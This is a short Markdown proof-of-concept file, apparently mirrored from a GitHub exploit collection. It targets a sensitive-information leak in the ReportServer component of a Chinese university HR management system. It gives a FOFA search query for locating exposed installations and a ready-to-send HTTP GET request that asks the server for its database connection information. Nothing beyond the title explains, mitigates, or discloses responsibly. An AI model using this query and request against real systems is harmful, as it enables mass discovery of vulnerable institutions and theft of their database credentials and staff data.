mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
22 lines
715 B
Markdown
22 lines
715 B
Markdown
|
|
# 高校人力资源管理系统ReportServer存在敏感信息泄露漏洞
|
||
|
|
高校人力资源管理系统ReportServer存在敏感信息泄露漏洞
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
```javascript
|
||
|
|
body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
## poc
|
||
|
|
```java
|
||
|
|
GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
|
||
|
|
Host:
|
||
|
|
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Accept: */*
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|